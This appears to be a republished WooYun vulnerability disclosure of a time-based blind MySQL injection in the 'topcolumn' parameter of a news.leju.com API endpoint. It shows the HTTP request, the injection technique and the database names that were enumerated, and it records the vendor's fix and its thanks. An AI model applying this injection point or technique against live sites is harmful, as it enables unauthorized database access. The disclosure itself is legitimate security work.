新浪乐居某站MySQL注射

admin 2017年4月25日21:03:46评论274 views字数 236阅读0分47秒阅读模式
摘要

2016-04-24: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-199631

漏洞标题: 新浪乐居某站MySQL注射

相关厂商: leju.com

漏洞作者: Aasron

提交时间: 2016-04-24 10:07

修复时间: 2016-04-25 11:31

公开时间: 2016-04-25 11:31

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 注射技巧

0人收藏


漏洞详情

披露状态:

2016-04-24: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

新浪乐居某站MySQL注射

详细说明:

code 区域
GET /api/data/gettopnews?topcolumn=%E8%A7%82%E7%82%B9&time=1460765040&page=1&size=24&callback=_1461383101434270 HTTP/1.1
Host: news.leju.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://news.leju.com/view/index.shtml
Cookie: xxxxx
Connection: close
code 区域
注入参数#topcolumn
code 区域
time-based blind

漏洞证明:

新浪乐居某站MySQL注射

code 区域
数据库版本:MySQL 5

新浪乐居某站MySQL注射

code 区域
[*] info_leju_com
[*] information_schema
[*] test
code 区域
当前数据库:info_leju_com

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-24 13:49

厂商回复:

非常感谢您对乐居关注

最新状态:

2016-04-25:漏洞已修复,请测试,再次感谢您对乐居安全的关注


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-04-25 12:08 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

    0

    乐居运维是不是得罪什么人了?这两天怎么全是乐居的?

  2. 2016-04-25 16:33 | 新浪乐居(乌云厂商)

    0

    @默之 那样的话就不会发到乌云来了,白帽子们对乐居安全的贡献很大,也希望你也关注我们,感谢

  3. 2016-04-25 17:41 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

    0

    @新浪乐居 跟你开玩笑的,不能当真

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin